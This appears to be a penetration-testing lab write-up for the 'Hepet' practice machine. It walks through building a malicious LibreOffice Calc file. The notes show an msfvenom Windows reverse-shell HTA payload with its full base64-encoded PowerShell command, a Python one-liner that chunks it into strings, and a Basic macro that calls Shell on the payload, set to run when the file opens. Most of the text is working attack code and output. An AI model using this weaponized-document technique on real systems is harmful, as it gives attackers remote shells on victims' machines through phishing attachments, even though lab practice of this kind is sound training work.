Libre Office (.ods)
/Practice/Hepet/3-Exploitation/attachments/{8997AA05-2759-4387-919B-68C6BA042D6F}.png)
Creating a LibreOffice Calc file; contacts.ods
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=$tun0 LPORT=443 -f hta-psh
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7264 bytes
<script language="VBScript">
window.moveTo -4000, -4000
Set mucOrun4MuJ = CreateObject("Wscript.Shell")
Set stT = CreateObject("Scripting.FileSystemObject")
For each path in Split(mucOrun4MuJ.ExpandEnvironmentStrings("%PSModulePath%"),";")
If stT.FileExists(path + "\..\powershell.exe") Then
mucOrun4MuJ.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABzADcAeAAyAGMAQwBBADcAVgBXAGIAVwAvAGEAJwAnACsAJwAnAFMAQgBEACsAWABxAG4ALwB3AGEAcQBRAGIARQB1AEUAdAA5AEMAawBpAFYAVABwAGIARgA1AHsAMQB9AGMAQQBJADQAbQBBAEIARgBwADgAVgBlADIAdwB0AHIATAA3AFgAWAB2AFAAWAA2ADMAMgA4AE0AZABrAGsAVQBVAHUAVgBPADYAawBvAEkAZQAzAFoAbQBkAHYAYQBaAFoAMgBiAHMAeABJAEgARgBDAFEAdQBFADYARQByADQAOABmAEcARABrAEsANABlAEMAcABFAHYAUwBMAG4ASQB2AHoAWgA2AGUAUwBIAG4AOABUAFcAUgBUADkAdQA1ACsAWAA0AHUAZgBCAFcAawBxAGIASgBhADEAWgBtAFAAUwBEAEMANwB2AGEAMwBGAFkAWQBnAEQAZgBuAHcAdgB0AEQAQgBYAG8AZwBqADcAYwAwAHAAdwBKAE0AbgBDAFAAOABMAEkAdwB5AEcAKwBlAEoAZwB2AHMATQBXAEYASAAwAEwAdQA3ADAASwBMAHMAagBtAGkAcQBkAHEAdQBoAGkAdwBQAEMAeABkAEsAWQBDAGQANwBYAFcAYQBoAEoATABDAEMAcwBhAEsARQBTACsASwAzAGIANgBJADgAdgBTAGoAUABDAG8AMwB2AE0AYQBLAFIASgBCAHEANwBpAEcATwAvAFkARgBNAHEAeQBzAEoAUABPAFQAbgB3AGMAYgBmAEMAawBxAGcAVABLADIAUQBSAGMAMwBoACcAJwArACcAJwBoAFIASQBMAEwAUwBtAEUAWQBSAE0AagBCADkAKwBCAHQAagBYAFgATQBQAFcAWgBIAEkAdAB6AGwAZABKAHMAUQA4AHoAJwAnACsAJwAnAGcATQBEAHAAZABLAHYAQgB4ADEASgBCAEUAZQBlAHkARwB6AEYAewAxAH0AcwBPAGMAUgBTACcAJwArACcAJwBKAGUAVwBHAGEAKwBKAC8ATwBaAG4AOQBKADAALwBUAHcAUQBSAHgAdwA0AHUATwBDAEYAbgBBAGMAcwBwAFcAQgB3AHoAVwB4AGMARgBSAG8AbwA4AEMAbQBlAEkAQwBkAEcAVgBnAFoAUABDAFMAQgBPADUAewAxAH0AbABVAEYAdQB6AEoAWgBaAHkAUQBVAHgAcABYAHYAZwB2AGIAcQBSADcAdgBNAG0AZwBlADYAKwBSADkAewAxAH0AdwBJAHQASABvADgAbABQAE8AUQAwADkAZgBYADEASgBrAGQAVQAzAHcAMABGAE0ALwBFACcAJwArACcAJwBlAGEAUwBCAEQAQwB1AGoAQQB1AEQAMwBNADQASABRAHkAZQBnAFQATwAyAGYAbwBjAHgASgBrAGEAMwByAFkAdwBSAEMAeAAxAEcATQBSAE8AWgBoACsARgBVAHAANQBRAFkAZgBEAEUAVwBmAGgARABsADUAegBqADIARwBNADUAZABrAHYAdgBJAFgAYwBJAHMAcQAvADEAMQBjADUATQB3AFEAegBpADIASwBRAFQARQAxAEcANwB7ADEAfQBuAEoALwBrAFgAdQBjADIAcwAxAFUAWABtAGIAeAAzAFgAcwBrAEEARABYAGQAdwBIAHkAaQBaAFYAUgBWAFQAcQBYAEQAKwB4AFEAZgBBAEMAagBrAEsAbgBkAFEAMwBpAFMAbQBHADUAZwB1ADQANABwAGQAaABGAFAASQBFADUAbwA4AGMAcQBzADQAUgBQACsAeQAxAGEAewAxAH0AQwBiAFYAeABxAEYAaQBRADAAdwBpAGkAJwAnACsAJwAnAGcAbgBUAEwATAA0AE0ANQBaAGsAMABTAHQAVQBEAEgAUABpAEIAMwBmAEEAZQBlADUAaAB3AG8ARQBKAHgAcABwADAAVwB4ACcAJwArACcAJwB5ADAANQBQADMAawBGAEoAcgBGAEUAVQBSAFgAbQBoAEYAMABPAEYAVwBuAG4AQgB3AEkAaABpAE8AeQA4AG8AUQBVAFQAUwBMAFMAWABtADcAUABBAG8AbgBzAEwAVgBZADgAcQBKAGgAUwBLAGUAJwAnACsAJwAnAHUAWgB2AEoATAA4AEIATQBEADYAMgB4AEkATwBKAGgAYgBFAEYARwBBAFkAQgBIAFkANABVAHQAZwBtAGkAQwBSADEANQBvAEUAeAB1AHIATwA0AE8ANAAyAGUASABpAFcAVABSAHEAaQBGAEsAbwBHAC8AQwAwAGgAbQB5AEEASgBFAEgAQgA0AEEAbABQAFEAbwBnAFQATwBDAEUAWABEAE0AdwAxAGYAMABXAHgARAB4AHEASABiAHQARwBrAHkASQBYAGUAawB7ADEAfQBiAEcAZwBWAGIASQB4AGIAWgA0AHsAMQB9AHMAJwAnACsAJwAnAGkAcwBBAG8ANQAwAFQAegBEAEoAdwBIAGcAVwBJAGkAVABhAG8ASQB6AG4AQgBaAE8ARQBIAEQAcABQAGcAaQAvAHcANgBuADgARQA4AEwAcgBoAFEAQwBTADEARQBLAGMANQBrAGIASwBhAG0AcQBvADcAbgB0AEEAKwBoADUALwAyAEMAVABkAFQAYQBBADUAQQBoAEIAeABBAGEASQBiAE0AVgAxAEcARQByADYAcgBIADEAaQBKADkASwBqADYAUQBtAGcASgByAHIAQQBWAFUAdAA5AFEAbABLAFMAcwBiAFUAdABaADAAKwBBADMASgBwAGMAYgBxADEALwBaAGQAWgA5AEUAdQBoAHYAVwB0ADUAeQBoAGEAcABPAG4AdABYAHIAMwBmAGIAbABmAFgASABjAE8AcwBjAHEATwBoADgAYgB1AGUAeAB2AFgARwAwADIASgBoAEsATwAzAEIAYwBNAHcAbgBtAHQASgArAEoASwBYAGwAdQBMAHAAZgBkAGMAagBlADYAQwByADIAZQBGAHUAOAAyAHEAdgA3AFQAVQBuAGQANwBoAGUAdQA3AFkAegByAGoAdQB7ADEAfQBlAE8AOABhAGcALwBMAGwASgB1AHEAewAxAH0AYQBYAHkAMQBWAFUATABmAGUAaQBMAHMAagBkAGEATwBXAHEAbABHAEQAYgB7ADEAfQBwADkATQB1AHcAdgBPADAAMAArAEgANQBzAFUARABaADIAaQArADEAUwArAFEAVwBUAGIARABSAGQAbQBtAGUAbAA3AFQAVgBGAGEAMwBxAFcAMQA3AHoAaABtAHkAOQBQAHQAMwBiAGgAZAB2AEIAbABWAGwAMABwAEQAVQBXAHAAQgB3ADIAeQBxADcARwA2AHMAaABrAHEAdgBhAEEANgBiAGEAbgAvAFkAVQBQAHQAOQBrAEYAMgA1AFIAYQBjAEsATQBsAHAAaABUAGEAVABYAFcASABkAEMAbQBlAEkAcQBhAGwAdwB7ADEAfQBmAE8AUwBwAEkANwB7ADEAfQBDAEoAcQB1AG4AZwBRAGUAKwBtAGgAQwBDAFgAaQB4AFYAewAxAH0AUgB0ACcAJwArACcAJwB2ADIAWgBmAHUAaQBKAGoAcgBvAG8AbABhADkAMwB5AGkAMQBEAHIAVgBzAHYAMQBrADcAdABzAFYANQBIAFUAbQBaAHQAeQA5AG0AVQBSADIAbwAxAFAAZgBxAE0AcQA0ADMATwBpAG8AOQAnACcAKwAnACcAWgBiAFMARwBBAHkASAB6AGMAbgBJAFgARQA1ACcAJwArACcAJwBHAGoAMwBRAHkARwBwAFkAbgBEAEYAdQBiAG8AZwBjACsAQwBGAFkAZgB6AE8AVwA4AHEATABkAGMAegBkAHUAVwBYAFQAagByACsAdQBEAGYASgB6ADYAZABWACsAegBpAHoAZgBDAEwARwBtAHoAdQAzAHsAMQB9ADcAYQB0AGYAdQBqADYAOABIADIAZgBqAGUAdgBNAEcAVgBZAEwASgBxAGYASQB7ADEAfQBmAFQASQBRAG4ANABaAFEAWABTAGYASABPAGQAOQBNAEMAUABIADMAJwAnACsAJwAnAEsAcgBYAFUAVgA3AGwAdgBHADMATwByAHkATwB3AHMAaABEAEYASgBnAEEAdgBUAHUAcgB3ACcAJwArACcAJwB5AFkATABtADIAawB6ADcAagBHAFMAVwBFAGcAUwB6AFAAUQBsAEQAZwB7ADEAfQBNAFkAUQByAEMAbgBNAHcAbwByAEYARABLAHIARwBRAFUAUQB7ADEAJwAnACsAJwAnAH0ATwBHAEkAWABRAGMARABjAG0AawBHAG0AcQBIAGkATQA0ADkAeQBjAEkAdgBSAGYAawAwAEkAVABMAFIANwBlADAARQBJACcAJwArACcAJwBvAFMAYQBBAE0AbwBXAHUAagBoAHcAdQBaAGMAdgBiAFMAOQBMAEoAZQBqAHMAcABXADIAcABlAG0ARAAvACsANgA5ACcAJwArACcAJwBWAFkANgB1AGQAbABQAGoASwBKADYAUABoAEEARQB2AHEAbQB4ADUAOABnAHoAdgBpAEMASgBMADAAcAA0AEcAQwA4AGMAKwBoAEcANwAwAEYAMQBWAHUAbwB3AGIAbABMAGEAQgAvAFEAeQA0ADUAMQBuACcAJwArACcAJwBXAEMAbgBNAGsAYQBmAEkANQBkAGUANgBrAFMAQwBFADMAQwBBAFcAQgBtAHUAUABVADMAbQBmAGsASQBPAHMATAAvAEEAMwA0AFUAYwBUADYAYgBpADgAeQBtAGIAOAArAFoALwBrAGkAMQBwAGEALwBMAGcAegAvADQAOQBXADAANgB5ADMAKwB5ACsAaQAwAEcAbAAvAEIARwBZAFYAKwBLAFgAZwBtAGYAdAAvAEkAOQBkAGYANABRAEkAQgB6ADAARABHAGkAegBGAHgAMQBGAC8ARABvAFcAMABQAEoANQBsADEAcABzAEQAOQA1ADEAMABKAFIAKwArAEQAegBHAC8AdQBJAGQAUAAnACcAKwAnACcAcQBVAHsAMQB9AC8ALwB4AGMAZQAvAEkATQBnAGMAUQBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcATgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==",0
Exit For
End If
Next
window.close()
</script>Generating a HBA PowerShell reverse shell payload Only the PowerShell part is needed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ python3 -c 'str = "powershell.exe -nop -w hidden -e <BASE64_PAYLOAD>"; n = 50; print("str = \"\"") ; [print("str = str + \"" + str[i:i+n] + "\"") for i in range(0, len(str), n)]'
str = ""
str = str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
str = str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
str = str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
str = str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
str = str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
str = str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
str = str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
str = str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
str = str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
str = str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
str = str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
str = str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
str = str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
str = str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
str = str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
str = str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
str = str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
str = str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
str = str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
str = str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
str = str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABzADcAeAA"
str = str + "yAGMAQwBBADcAVgBXAGIAVwAvAGEAJwAnACsAJwAnAFMAQgBEA"
str = str + "CsAWABxAG4ALwB3AGEAcQBRAGIARQB1AEUAdAA5AEMAawBpAFY"
str = str + "AVABwAGIARgA1AHsAMQB9AGMAQQBJADQAbQBBAEIARgBwADgAV"
str = str + "gBlADIAdwB0AHIATAA3AFgAWAB2AFAAWAA2ADMAMgA4AE0AZAB"
str = str + "rAGsAVQBVAHUAVgBPADYAawBvAEkAZQAzAFoAbQBkAHYAYQBaA"
str = str + "FoAMgBiAHMAeABJAEgARgBDAFEAdQBFADYARQByADQAOABmAEc"
str = str + "ARABrAEsANABlAEMAcABFAHYAUwBMAG4ASQB2AHoAWgA2AGUAU"
str = str + "wBIAG4AOABUAFcAUgBUADkAdQA1ACsAWAA0AHUAZgBCAFcAawB"
str = str + "xAGIASgBhADEAWgBtAFAAUwBEAEMANwB2AGEAMwBGAFkAWQBnA"
str = str + "EQAZgBuAHcAdgB0AEQAQgBYAG8AZwBqADcAYwAwAHAAdwBKAE0"
str = str + "AbgBDAFAAOABMAEkAdwB5AEcAKwBlAEoAZwB2AHMATQBXAEYAS"
str = str + "AAwAEwAdQA3ADAASwBMAHMAagBtAGkAcQBkAHEAdQBoAGkAdwB"
str = str + "QAEMAeABkAEsAWQBDAGQANwBYAFcAYQBoAEoATABDAEMAcwBhA"
str = str + "EsARQBTACsASwAzAGIANgBJADgAdgBTAGoAUABDAG8AMwB2AE0"
str = str + "AYQBLAFIASgBCAHEANwBpAEcATwAvAFkARgBNAHEAeQBzAEoAU"
str = str + "ABPAFQAbgB3AGMAYgBmAEMAawBxAGcAVABLADIAUQBSAGMAMwB"
str = str + "oACcAJwArACcAJwBoAFIASQBMAEwAUwBtAEUAWQBSAE0AagBCA"
str = str + "DkAKwBCAHQAagBYAFgATQBQAFcAWgBIAEkAdAB6AGwAZABKAHM"
str = str + "AUQA4AHoAJwAnACsAJwAnAGcATQBEAHAAZABLAHYAQgB4ADEAS"
str = str + "gBCAEUAZQBlAHkARwB6AEYAewAxAH0AcwBPAGMAUgBTACcAJwA"
str = str + "rACcAJwBKAGUAVwBHAGEAKwBKAC8ATwBaAG4AOQBKADAALwBUA"
str = str + "HcAUQBSAHgAdwA0AHUATwBDAEYAbgBBAGMAcwBwAFcAQgB3AHo"
str = str + "AVwB4AGMARgBSAG8AbwA4AEMAbQBlAEkAQwBkAEcAVgBnAFoAU"
str = str + "ABDAFMAQgBPADUAewAxAH0AbABVAEYAdQB6AEoAWgBaAHkAUQB"
str = str + "VAHgAcABYAHYAZwB2AGIAcQBSADcAdgBNAG0AZwBlADYAKwBSA"
str = str + "DkAewAxAH0AdwBJAHQASABvADgAbABQAE8AUQAwADkAZgBYADE"
str = str + "ASgBrAGQAVQAzAHcAMABGAE0ALwBFACcAJwArACcAJwBlAGEAU"
str = str + "wBCAEQAQwB1AGoAQQB1AEQAMwBNADQASABRAHkAZQBnAFQATwA"
str = str + "yAGYAbwBjAHgASgBrAGEAMwByAFkAdwBSAEMAeAAxAEcATQBSA"
str = str + "E8AWgBoACsARgBVAHAANQBRAFkAZgBEAEUAVwBmAGgARABsADU"
str = str + "AegBqADIARwBNADUAZABrAHYAdgBJAFgAYwBJAHMAcQAvADEAM"
str = str + "QBjADUATQB3AFEAegBpADIASwBRAFQARQAxAEcANwB7ADEAfQB"
str = str + "uAEoALwBrAFgAdQBjADIAcwAxAFUAWABtAGIAeAAzAFgAcwBrA"
str = str + "EEARABYAGQAdwBIAHkAaQBaAFYAUgBWAFQAcQBYAEQAKwB4AFE"
str = str + "AZgBBAEMAagBrAEsAbgBkAFEAMwBpAFMAbQBHADUAZwB1ADQAN"
str = str + "ABwAGQAaABGAFAASQBFADUAbwA4AGMAcQBzADQAUgBQACsAeQA"
str = str + "xAGEAewAxAH0AQwBiAFYAeABxAEYAaQBRADAAdwBpAGkAJwAnA"
str = str + "CsAJwAnAGcAbgBUAEwATAA0AE0ANQBaAGsAMABTAHQAVQBEAEg"
str = str + "AUABpAEIAMwBmAEEAZQBlADUAaAB3AG8ARQBKAHgAcABwADAAV"
str = str + "wB4ACcAJwArACcAJwB5ADAANQBQADMAawBGAEoAcgBGAEUAVQB"
str = str + "SAFgAbQBoAEYAMABPAEYAVwBuAG4AQgB3AEkAaABpAE8AeQA4A"
str = str + "G8AUQBVAFQAUwBMAFMAWABtADcAUABBAG8AbgBzAEwAVgBZADg"
str = str + "AcQBKAGgAUwBLAGUAJwAnACsAJwAnAHUAWgB2AEoATAA4AEIAT"
str = str + "QBEADYAMgB4AEkATwBKAGgAYgBFAEYARwBBAFkAQgBIAFkANAB"
str = str + "VAHQAZwBtAGkAQwBSADEANQBvAEUAeAB1AHIATwA0AE8ANAAyA"
str = str + "GUASABpAFcAVABSAHEAaQBGAEsAbwBHAC8AQwAwAGgAbQB5AEE"
str = str + "ASgBFAEgAQgA0AEEAbABQAFEAbwBnAFQATwBDAEUAWABEAE0Ad"
str = str + "wAxAGYAMABXAHgARAB4AHEASABiAHQARwBrAHkASQBYAGUAawB"
str = str + "7ADEAfQBiAEcAZwBWAGIASQB4AGIAWgA0AHsAMQB9AHMAJwAnA"
str = str + "CsAJwAnAGkAcwBBAG8ANQAwAFQAegBEAEoAdwBIAGcAVwBJAGk"
str = str + "AVABhAG8ASQB6AG4AQgBaAE8ARQBIAEQAcABQAGcAaQAvAHcAN"
str = str + "gBuADgARQA4AEwAcgBoAFEAQwBTADEARQBLAGMANQBrAGIASwB"
str = str + "hAG0AcQBvADcAbgB0AEEAKwBoADUALwAyAEMAVABkAFQAYQBBA"
str = str + "DUAQQBoAEIAeABBAGEASQBiAE0AVgAxAEcARQByADYAcgBIADE"
str = str + "AaQBKADkASwBqADYAUQBtAGcASgByAHIAQQBWAFUAdAA5AFEAb"
str = str + "ABLAFMAcwBiAFUAdABaADAAKwBBADMASgBwAGMAYgBxADEALwB"
str = str + "aAGQAWgA5AEUAdQBoAHYAVwB0ADUAeQBoAGEAcABPAG4AdABYA"
str = str + "HIAMwBmAGIAbABmAFgASABjAE8AcwBjAHEATwBoADgAYgB1AGU"
str = str + "AeAB2AFgARwAwADIASgBoAEsATwAzAEIAYwBNAHcAbgBtAHQAS"
str = str + "gArAEoASwBYAGwAdQBMAHAAZgBkAGMAagBlADYAQwByADIAZQB"
str = str + "GAHUAOAAyAHEAdgA3AFQAVQBuAGQANwBoAGUAdQA3AFkAegByA"
str = str + "GoAdQB7ADEAfQBlAE8AOABhAGcALwBMAGwASgB1AHEAewAxAH0"
str = str + "AYQBYAHkAMQBWAFUATABmAGUAaQBMAHMAagBkAGEATwBXAHEAb"
str = str + "ABHAEQAYgB7ADEAfQBwADkATQB1AHcAdgBPADAAMAArAEgANQB"
str = str + "zAFUARABaADIAaQArADEAUwArAFEAVwBUAGIARABSAGQAbQBtA"
str = str + "GUAbAA3AFQAVgBGAGEAMwBxAFcAMQA3AHoAaABtAHkAOQBQAHQ"
str = str + "AMwBiAGgAZAB2AEIAbABWAGwAMABwAEQAVQBXAHAAQgB3ADIAe"
str = str + "QBxADcARwA2AHMAaABrAHEAdgBhAEEANgBiAGEAbgAvAFkAVQB"
str = str + "QAHQAOQBrAEYAMgA1AFIAYQBjAEsATQBsAHAAaABUAGEAVABYA"
str = str + "FcASABkAEMAbQBlAEkAcQBhAGwAdwB7ADEAfQBmAE8AUwBwAEk"
str = str + "ANwB7ADEAfQBDAEoAcQB1AG4AZwBRAGUAKwBtAGgAQwBDAFgAa"
str = str + "QB4AFYAewAxAH0AUgB0ACcAJwArACcAJwB2ADIAWgBmAHUAaQB"
str = str + "KAGoAcgBvAG8AbABhADkAMwB5AGkAMQBEAHIAVgBzAHYAMQBrA"
str = str + "DcAdABzAFYANQBIAFUAbQBaAHQAeQA5AG0AVQBSADIAbwAxAFA"
str = str + "AZgBxAE0AcQA0ADMATwBpAG8AOQAnACcAKwAnACcAWgBiAFMAR"
str = str + "wBBAHkASAB6AGMAbgBJAFgARQA1ACcAJwArACcAJwBHAGoAMwB"
str = str + "RAHkARwBwAFkAbgBEAEYAdQBiAG8AZwBjACsAQwBGAFkAZgB6A"
str = str + "E8AVwA4AHEATABkAGMAegBkAHUAVwBYAFQAagByACsAdQBEAGY"
str = str + "ASgB6ADYAZABWACsAegBpAHoAZgBDAEwARwBtAHoAdQAzAHsAM"
str = str + "QB9ADcAYQB0AGYAdQBqADYAOABIADIAZgBqAGUAdgBNAEcAVgB"
str = str + "ZAEwASgBxAGYASQB7ADEAfQBmAFQASQBRAG4ANABaAFEAWABTA"
str = str + "GYASABPAGQAOQBNAEMAUABIADMAJwAnACsAJwAnAEsAcgBYAFU"
str = str + "AVgA3AGwAdgBHADMATwByAHkATwB3AHMAaABEAEYASgBnAEEAd"
str = str + "gBUAHUAcgB3ACcAJwArACcAJwB5AFkATABtADIAawB6ADcAagB"
str = str + "HAFMAVwBFAGcAUwB6AFAAUQBsAEQAZwB7ADEAfQBNAFkAUQByA"
str = str + "EMAbgBNAHcAbwByAEYARABLAHIARwBRAFUAUQB7ADEAJwAnACs"
str = str + "AJwAnAH0ATwBHAEkAWABRAGMARABjAG0AawBHAG0AcQBIAGkAT"
str = str + "QA0ADkAeQBjAEkAdgBSAGYAawAwAEkAVABMAFIANwBlADAARQB"
str = str + "JACcAJwArACcAJwBvAFMAYQBBAE0AbwBXAHUAagBoAHcAdQBaA"
str = str + "GMAdgBiAFMAOQBMAEoAZQBqAHMAcABXADIAcABlAG0ARAAvACs"
str = str + "ANgA5ACcAJwArACcAJwBWAFkANgB1AGQAbABQAGoASwBKADYAU"
str = str + "ABoAEEARQB2AHEAbQB4ADUAOABnAHoAdgBpAEMASgBMADAAcAA"
str = str + "0AEcAQwA4AGMAKwBoAEcANwAwAEYAMQBWAHUAbwB3AGIAbABMA"
str = str + "GEAQgAvAFEAeQA0ADUAMQBuACcAJwArACcAJwBXAEMAbgBNAGs"
str = str + "AYQBmAEkANQBkAGUANgBrAFMAQwBFADMAQwBBAFcAQgBtAHUAU"
str = str + "ABVADMAbQBmAGsASQBPAHMATAAvAEEAMwA0AFUAYwBUADYAYgB"
str = str + "pADgAeQBtAGIAOAArAFoALwBrAGkAMQBwAGEALwBMAGcAegAvA"
str = str + "DQAOQBXADAANgB5ADMAKwB5ACsAaQAwAEcAbAAvAEIARwBZAFY"
str = str + "AKwBLAFgAZwBtAGYAdAAvAEkAOQBkAGYANABRAEkAQgB6ADAAR"
str = str + "ABHAGkAegBGAHgAMQBGAC8ARABvAFcAMABQAEoANQBsADEAcAB"
str = str + "zAEQAOQA1ADEAMABKAFIAKwArAEQAegBHAC8AdQBJAGQAUAAnA"
str = str + "CcAKwAnACcAcQBVAHsAMQB9AC8ALwB4AGMAZQAvAEkATQBnAGM"
str = str + "AUQBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAP"
str = str + "QAnACcALAAnACcATgAnACcAKQApACkAKQAsAFsAUwB5AHMAdAB"
str = str + "lAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDA"
str = str + "G8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGU"
str = str + "AYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8AR"
str = str + "QBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbAB"
str = str + "sAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuA"
str = str + "FIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQ"
str = str + "AcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8Ad"
str = str + "wBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgB"
str = str + "DAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1A"
str = str + "GUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8"
str = str + "AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAY"
str = str + "QByAHQAKAAkAHMAKQA7AA=="Dividing the payload by 50 chars
/Practice/Hepet/3-Exploitation/attachments/{F89C28A7-9311-4663-B88E-0960F6B834A3}.png)
/Practice/Hepet/3-Exploitation/attachments/{34E49BCA-AD42-4EBF-A34B-6798E73CB20A}.png)
Creating a new macro module,Exploit, within the contacts.ods file
Basically embedding a macro
/Practice/Hepet/3-Exploitation/attachments/{E4BF6C4C-F57A-4913-B642-CF3E73B47CFF}.png)
REM ***** BASIC *****
Sub Main
Dim str as String
str = ""
str = str + "cmd.exe /C powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
[...REDACTED...]
str = str + "HMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA="
Shell(str)
End SubBuilding a macro with the payload
/Practice/Hepet/3-Exploitation/attachments/Pasted-image-20250304174120.png)
/Practice/Hepet/3-Exploitation/attachments/{C1936296-50C9-4506-931B-08C2014E47AE}.png)
On the contacts.ods window, Tools > Customize > Event
Setting up a trigger so that the malicious macro runs as the file gets open
Libre Office 2 (.ods)
/Practice/Hepet/3-Exploitation/attachments/{0D9FA64D-E944-4A13-84D9-6737FF3BFBED}.png)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
